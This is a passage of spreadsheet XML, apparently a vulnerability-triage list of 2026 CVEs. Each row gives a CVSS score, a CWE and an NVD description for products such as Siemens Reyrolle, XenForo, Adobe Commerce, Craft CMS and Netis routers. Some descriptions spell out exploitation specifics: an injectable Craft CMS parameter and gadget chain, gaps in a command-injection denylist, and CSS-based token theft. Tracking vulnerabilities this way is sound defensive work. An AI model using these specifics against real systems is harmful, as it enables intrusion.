Medium</t></is></c><c r="B269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C269" s="5" t="inlineStr"><is><t>CVE-2026-62648</t></is></c><c r="D269" s="5" t="n"><v>8.699999999999999</v></c><c r="E269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F269" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G269" s="5" t="inlineStr" /><c r="H269" s="5" t="n"><v>0.003</v></c><c r="I269" s="5" t="inlineStr" /><c r="J269" s="5" t="inlineStr" /><c r="K269" s="5" t="inlineStr" /><c r="L269" s="5" t="inlineStr" /><c r="M269" s="5" t="inlineStr" /><c r="N269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q269" s="5" t="inlineStr" /><c r="R269" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S269" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t></is></c><c r="T269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t></is></c></row><row r="270"><c r="A270" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C270" s="5" t="inlineStr"><is><t>CVE-2026-62649</t></is></c><c r="D270" s="5" t="n"><v>8.699999999999999</v></c><c r="E270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F270" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G270" s="5" t="inlineStr" /><c r="H270" s="5" t="n"><v>0.003</v></c><c r="I270" s="5" t="inlineStr" /><c r="J270" s="5" t="inlineStr" /><c r="K270" s="5" t="inlineStr" /><c r="L270" s="5" t="inlineStr" /><c r="M270" s="5" t="inlineStr" /><c r="N270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q270" s="5" t="inlineStr" /><c r="R270" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S270" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t></is></c><c r="T270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t></is></c></row><row r="271"><c r="A271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C271" s="5" t="inlineStr"><is><t>CVE-2026-62650</t></is></c><c r="D271" s="5" t="n"><v>8.699999999999999</v></c><c r="E271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F271" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G271" s="5" t="inlineStr" /><c r="H271" s="5" t="n"><v>0.003</v></c><c r="I271" s="5" t="inlineStr" /><c r="J271" s="5" t="inlineStr" /><c r="K271" s="5" t="inlineStr" /><c r="L271" s="5" t="inlineStr" /><c r="M271" s="5" t="inlineStr" /><c r="N271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q271" s="5" t="inlineStr" /><c r="R271" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S271" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t></is></c><c r="T271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t></is></c></row><row r="272"><c r="A272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C272" s="5" t="inlineStr"><is><t>CVE-2026-73314</t></is></c><c r="D272" s="5" t="n"><v>8.699999999999999</v></c><c r="E272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F272" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G272" s="5" t="inlineStr" /><c r="H272" s="5" t="n"><v>0.005</v></c><c r="I272" s="5" t="inlineStr" /><c r="J272" s="5" t="inlineStr" /><c r="K272" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L272" s="5" t="inlineStr" /><c r="M272" s="5" t="inlineStr" /><c r="N272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P272" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q272" s="5" t="inlineStr" /><c r="R272" s="5" t="inlineStr"><is><t>CWE-754</t></is></c><c r="S272" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t></is></c><c r="T272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t></is></c></row><row r="273"><c r="A273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C273" s="5" t="inlineStr"><is><t>CVE-2026-73316</t></is></c><c r="D273" s="5" t="n"><v>8.699999999999999</v></c><c r="E273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F273" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G273" s="5" t="inlineStr" /><c r="H273" s="5" t="n"><v>0.002</v></c><c r="I273" s="5" t="inlineStr" /><c r="J273" s="5" t="inlineStr" /><c r="K273" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L273" s="5" t="inlineStr" /><c r="M273" s="5" t="inlineStr" /><c r="N273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P273" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q273" s="5" t="inlineStr" /><c r="R273" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="S273" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t></is></c><c r="T273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t></is></c></row><row r="274"><c r="A274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C274" s="5" t="inlineStr"><is><t>CVE-2026-77111</t></is></c><c r="D274" s="5" t="n"><v>8.699999999999999</v></c><c r="E274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F274" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G274" s="5" t="inlineStr" /><c r="H274" s="5" t="n"><v>0.005</v></c><c r="I274" s="5" t="inlineStr" /><c r="J274" s="5" t="inlineStr" /><c r="K274" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L274" s="5" t="inlineStr" /><c r="M274" s="5" t="inlineStr" /><c r="N274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P274" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q274" s="5" t="inlineStr" /><c r="R274" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S274" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t></is></c></row><row r="275"><c r="A275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C275" s="5" t="inlineStr"><is><t>CVE-2026-80219</t></is></c><c r="D275" s="5" t="n"><v>8.699999999999999</v></c><c r="E275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F275" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G275" s="5" t="inlineStr" /><c r="H275" s="5" t="n"><v>0.002</v></c><c r="I275" s="5" t="inlineStr" /><c r="J275" s="5" t="inlineStr" /><c r="K275" s="5" t="inlineStr" /><c r="L275" s="5" t="inlineStr" /><c r="M275" s="5" t="inlineStr" /><c r="N275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P275" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q275" s="5" t="inlineStr" /><c r="R275" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S275" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t></is></c><c r="T275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t></is></c></row><row r="276"><c r="A276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C276" s="5" t="inlineStr"><is><t>CVE-2026-82064</t></is></c><c r="D276" s="5" t="n"><v>8.699999999999999</v></c><c r="E276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F276" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G276" s="5" t="inlineStr" /><c r="H276" s="5" t="n"><v>0.003</v></c><c r="I276" s="5" t="inlineStr" /><c r="J276" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K276" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L276" s="5" t="inlineStr" /><c r="M276" s="5" t="inlineStr" /><c r="N276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P276" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q276" s="5" t="inlineStr" /><c r="R276" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S276" s="5" t="inlineStr"><is><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is></c><c r="T276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t></is></c></row><row r="277"><c r="A277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C277" s="5" t="inlineStr"><is><t>CVE-2026-82075</t></is></c><c r="D277" s="5" t="n"><v>8.699999999999999</v></c><c r="E277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F277" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G277" s="5" t="inlineStr" /><c r="H277" s="5" t="n"><v>0.003</v></c><c r="I277" s="5" t="inlineStr" /><c r="J277" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K277" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L277" s="5" t="inlineStr" /><c r="M277" s="5" t="inlineStr" /><c r="N277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P277" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q277" s="5" t="inlineStr" /><c r="R277" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S277" s="5" t="inlineStr"><is><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is></c><c r="T277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t></is></c></row><row r="278"><c r="A278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C278" s="5" t="inlineStr"><is><t>CVE-2026-86727</t></is></c><c r="D278" s="5" t="n"><v>8.699999999999999</v></c><c r="E278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F278" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G278" s="5" t="inlineStr" /><c r="H278" s="5" t="n"><v>0.003</v></c><c r="I278" s="5" t="inlineStr" /><c r="J278" s="5" t="inlineStr" /><c r="K278" s="5" t="inlineStr" /><c r="L278" s="5" t="inlineStr" /><c r="M278" s="5" t="inlineStr" /><c r="N278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P278" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q278" s="5" t="inlineStr" /><c r="R278" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S278" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an information disclosure vulnerability in plugin/Live/stats.json.php that allows unauthenticated attackers to retrieve stream keys and m3u8 URLs by accessing the endpoint without authentication. Attackers can enumerate private, unlisted, and group-restricted live streams by parsing the hidden_applications array in the JSON response to obtain sensitive streaming credentials.</t></is></c><c r="T278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t></is></c></row><row r="279"><c r="A279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C279" s="5" t="inlineStr"><is><t>CVE-2026-86732</t></is></c><c r="D279" s="5" t="n"><v>8.699999999999999</v></c><c r="E279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F279" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G279" s="5" t="inlineStr" /><c r="H279" s="5" t="n"><v>0.005</v></c><c r="I279" s="5" t="inlineStr" /><c r="J279" s="5" t="inlineStr" /><c r="K279" s="5" t="inlineStr" /><c r="L279" s="5" t="inlineStr" /><c r="M279" s="5" t="inlineStr" /><c r="N279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P279" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q279" s="5" t="inlineStr" /><c r="R279" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S279" s="5" t="inlineStr"><is><t>Craft CMS versions before 5.10.12 contain a remote code execution vulnerability in the element-index endpoint that allows authenticated content editors to instantiate arbitrary classes through the criteria parameter. Attackers can inject a malicious class via criteria[withTransforms][0][class] that reaches ImageTransforms::normalizeTransform(), then use a PHP gadget chain with yii\rbac\PhpManager to execute code by pointing itemFile to a request log containing PHP payload in the User-Agent header.</t></is></c><c r="T279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t></is></c></row><row r="280"><c r="A280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C280" s="5" t="inlineStr"><is><t>CVE-2026-86738</t></is></c><c r="D280" s="5" t="n"><v>8.699999999999999</v></c><c r="E280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G280" s="5" t="inlineStr" /><c r="H280" s="5" t="n"><v>0.003</v></c><c r="I280" s="5" t="inlineStr" /><c r="J280" s="5" t="inlineStr" /><c r="K280" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L280" s="5" t="inlineStr" /><c r="M280" s="5" t="inlineStr" /><c r="N280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P280" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q280" s="5" t="inlineStr" /><c r="R280" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S280" s="5" t="inlineStr"><is><t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t></is></c><c r="T280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t></is></c></row><row r="281"><c r="A281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C281" s="5" t="inlineStr"><is><t>CVE-2026-34223</t></is></c><c r="D281" s="5" t="n"><v>8.6</v></c><c r="E281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F281" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G281" s="5" t="inlineStr" /><c r="H281" s="5" t="n"><v>0.001</v></c><c r="I281" s="5" t="inlineStr" /><c r="J281" s="5" t="inlineStr" /><c r="K281" s="5" t="inlineStr" /><c r="L281" s="5" t="inlineStr" /><c r="M281" s="5" t="inlineStr" /><c r="N281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P281" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q281" s="5" t="inlineStr" /><c r="R281" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S281" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t></is></c><c r="T281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t></is></c></row><row r="282"><c r="A282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C282" s="5" t="inlineStr"><is><t>CVE-2026-61517</t></is></c><c r="D282" s="5" t="n"><v>8.6</v></c><c r="E282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F282" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G282" s="5" t="inlineStr" /><c r="H282" s="5" t="n"><v>0.016</v></c><c r="I282" s="5" t="inlineStr" /><c r="J282" s="5" t="inlineStr" /><c r="K282" s="5" t="inlineStr" /><c r="L282" s="5" t="inlineStr" /><c r="M282" s="5" t="inlineStr" /><c r="N282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q282" s="5" t="inlineStr" /><c r="R282" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S282" s="5" t="inlineStr"><is><t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an OS command injection vulnerability in the ping diagnostic handler that allows authenticated administrators to execute arbitrary shell commands as root by injecting into the IpAddr parameter. The parameter is interpolated directly into a shell command executed through system() with an incomplete denylist that only blocks spaces, pipes, semicolons, and ampersands, leaving command substitution and alternate field separator expansion available for exploitation.</t></is></c><c r="T282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t></is></c></row><row r="283"><c r="A283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C283" s="5" t="inlineStr"><is><t>CVE-2026-74239</t></is></c><c r="D283" s="5" t="n"><v>8.6</v></c><c r="E283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F283" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G283" s="5" t="inlineStr" /><c r="H283" s="5" t="n"><v>0.007</v></c><c r="I283" s="5" t="inlineStr" /><c r="J283" s="5" t="inlineStr" /><c r="K283" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L283" s="5" t="inlineStr" /><c r="M283" s="5" t="inlineStr" /><c r="N283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P283" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q283" s="5" t="inlineStr" /><c r="R283" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S283" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t></is></c><c r="T283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t></is></c></row><row r="284"><c r="A284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C284" s="5" t="inlineStr"><is><t>CVE-2026-75990</t></is></c><c r="D284" s="5" t="n"><v>8.6</v></c><c r="E284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F284" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G284" s="5" t="inlineStr" /><c r="H284" s="5" t="n"><v>0.002</v></c><c r="I284" s="5" t="inlineStr" /><c r="J284" s="5" t="inlineStr" /><c r="K284" s="5" t="inlineStr" /><c r="L284" s="5" t="inlineStr" /><c r="M284" s="5" t="inlineStr" /><c r="N284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P284" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q284" s="5" t="inlineStr" /><c r="R284" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S284" s="5" t="inlineStr"><is><t>Illustrator is affected by an Incorrect Authorization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is></c><c r="T284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t></is></c></row><row r="285"><c r="A285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C285" s="5" t="inlineStr"><is><t>CVE-2026-75991</t></is></c><c r="D285" s="5" t="n"><v>8.6</v></c><c r="E285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F285" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G285" s="5" t="inlineStr" /><c r="H285" s="5" t="n"><v>0.002</v></c><c r="I285" s="5" t="inlineStr" /><c r="J285" s="5" t="inlineStr" /><c r="K285" s="5" t="inlineStr" /><c r="L285" s="5" t="inlineStr" /><c r="M285" s="5" t="inlineStr" /><c r="N285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P285" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q285" s="5" t="inlineStr" /><c r="R285" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S285" s="5" t="inlineStr"><is><t>Illustrator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is></c><c r="T285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t></is></c></row><row r="286"><c r="A286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C286" s="5" t="inlineStr"><is><t>CVE-2026-76190</t></is></c><c r="D286" s="5" t="n"><v>8.6</v></c><c r="E286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F286" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G286" s="5" t="inlineStr" /><c r="H286" s="5" t="n"><v>0.01</v></c><c r="I286" s="5" t="inlineStr" /><c r="J286" s="5" t="inlineStr" /><c r="K286" s="5" t="inlineStr" /><c r="L286" s="5" t="inlineStr" /><c r="M286" s="5" t="inlineStr" /><c r="N286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P286" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q286" s="5" t="inlineStr" /><c r="R286" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S286" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t></is></c></row><row r="287"><c r="A287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C287" s="5" t="inlineStr"><is><t>CVE-2026-76199</t></is></c><c r="D287" s="5" t="n"><v>8.6</v></c><c r="E287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F287" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G287" s="5" t="inlineStr" /><c r="H287" s="5" t="n"><v>0.002</v></c><c r="I287" s="5" t="inlineStr" /><c r="J287" s="5" t="inlineStr" /><c r="K287" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L287" s="5" t="inlineStr" /><c r="M287" s="5" t="inlineStr" /><c r="N287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P287" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q287" s="5" t="inlineStr" /><c r="R287" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S287" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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is></c><c r="T287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t></is></c></row><row r="288"><c r="A288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C288" s="5" t="inlineStr"><is><t>CVE-2026-77109</t></is></c><c r="D288" s="5" t="n"><v>8.6</v></c><c r="E288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F288" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G288" s="5" t="inlineStr" /><c r="H288" s="5" t="n"><v>0.004</v></c><c r="I288" s="5" t="inlineStr" /><c r="J288" s="5" t="inlineStr" /><c r="K288" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L288" s="5" t="inlineStr" /><c r="M288" s="5" t="inlineStr" /><c r="N288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P288" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q288" s="5" t="inlineStr" /><c r="R288" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S288" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t></is></c></row><row r="289"><c r="A289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C289" s="5" t="inlineStr"><is><t>CVE-2026-77774</t></is></c><c r="D289" s="5" t="n"><v>8.6</v></c><c r="E289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F289" s="5" 